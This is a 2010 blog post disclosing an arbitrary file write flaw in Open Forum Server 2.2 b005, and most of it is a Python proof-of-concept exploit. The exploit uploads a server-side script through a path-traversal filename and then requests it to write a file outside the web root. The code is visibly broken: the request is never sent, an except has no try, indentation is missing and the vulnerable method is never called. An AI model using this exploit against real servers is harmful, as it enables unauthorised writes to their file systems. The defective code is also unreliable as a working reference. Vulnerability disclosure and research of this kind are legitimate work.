This site is soon to be deprecated by

Sunday, May 23, 2010

Open Forum Server 2.2 b005 Arbitrary File Write

An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be exploited to write to the local file system of the server.

Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.

import sys, socket
host = 'localhost'
port = 80

def send_request(request):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(32) # sometimes it takes a while
s.connect((host, port))

response = s.recv(8192) + s.recv(8192) # a hack within a hack

return response

def write_file():
content = '----x--\r\n'\
'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
'Content-Type: application/octet-stream\r\n\r\n'\
'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
'data = "hello, world";\r\n'\
'user = transaction.getUser();\r\n'\
'transaction.sendPage("File Written");\r\n\r\n'\

response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Content-Type: multipart/form-data; boundary=--x--\r\n'
'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

if 'HTTP/1.1 302 Redirect' not in response:
print 'Error writing get.sjs'
else: print 'get.sjs created'

response = send_request('GET OpenForum HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')

if 'File Written' not in response:
print 'Error writing to root'
else: print 'x.txt created in root'

except Exception:
print sys.exc_info()


No comments:

Post a Comment